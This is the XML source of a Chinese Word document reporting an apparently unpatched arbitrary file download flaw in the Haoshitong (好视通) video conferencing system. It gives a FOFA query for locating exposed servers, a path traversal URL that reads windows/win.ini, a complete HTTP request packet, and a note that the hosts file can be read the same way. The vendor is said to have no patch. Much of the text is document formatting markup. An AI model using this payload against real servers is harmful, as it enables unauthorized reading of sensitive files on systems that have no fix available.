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8" w:afterAutospacing="0" w:line="17" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>银澎云计算 好视通视频会议系统 任意文件下载(0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一、漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>深圳银澎云计算有限公司于2013年09月11成立，公司经营范围包括云计算技术的开发与销售、计算机软件、硬件产品的设计等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>深圳银澎云计算有限公司好视通视频会议系统存在任意文件下载漏洞，攻击者可利用该漏洞获取敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二、漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>银澎云计算 好视通视频会议系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FOFA: app="Hanming-Video-Conferencing"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2586990"/>
            <wp:effectExtent l="0" t="0" r="635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5266690" cy="2586990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2）登录界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2586990"/>
            <wp:effectExtent l="0" t="0" r="635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5266690" cy="2586990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞Url为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2693035"/>
            <wp:effectExtent l="0" t="0" r="825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5264785" cy="2693035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请求包为</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GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Host: xxx.xxx.xxx.xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Cookie: mldn-session-id=7950aca4-6faa-46d9-858a-97b82d619741</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1788795"/>
            <wp:effectExtent l="0" t="0" r="635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5266690" cy="1788795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5）</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或者读取hosts文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2414270"/>
            <wp:effectExtent l="0" t="0" r="635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5266690" cy="2414270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目前厂商尚未提供相关漏洞补丁链接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>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icrosoft YaHei U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29AE71C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F29AE71C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>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C37337"/>
    <w:rsid w:val="139261F5"/>
    <w:rsid w:val="191663D2"/>
    <w:rsid w:val="1A9C7CB6"/>
    <w:rsid w:val="1FCB456F"/>
    <w:rsid w:val="28A36B93"/>
    <w:rsid w:val="2EA87F41"/>
    <w:rsid w:val="30704D10"/>
    <w:rsid w:val="39EC0787"/>
    <w:rsid w:val="43BB7BE3"/>
    <w:rsid w:val="467456A8"/>
    <w:rsid w:val="4E7C3E05"/>
    <w:rsid w:val="505B3299"/>
    <w:rsid w:val="50EF58C5"/>
    <w:rsid w:val="55BD7786"/>
    <w:rsid w:val="588A59D7"/>
    <w:rsid w:val="5ABD60D8"/>
    <w:rsid w:val="607125D5"/>
    <w:rsid w:val="63E95BC7"/>
    <w:rsid w:val="69C92D02"/>
    <w:rsid w:val="6A233384"/>
    <w:rsid w:val="78B01D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4">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19</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_11.1.0.9995_F1E327BC-269C-435d-A152-05C5408002CA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2021-04-06T07:35:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-06T09:32:30Z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2052-11.1.0.9995</vt:lpwstr>
  </property>
</Properties>
</file>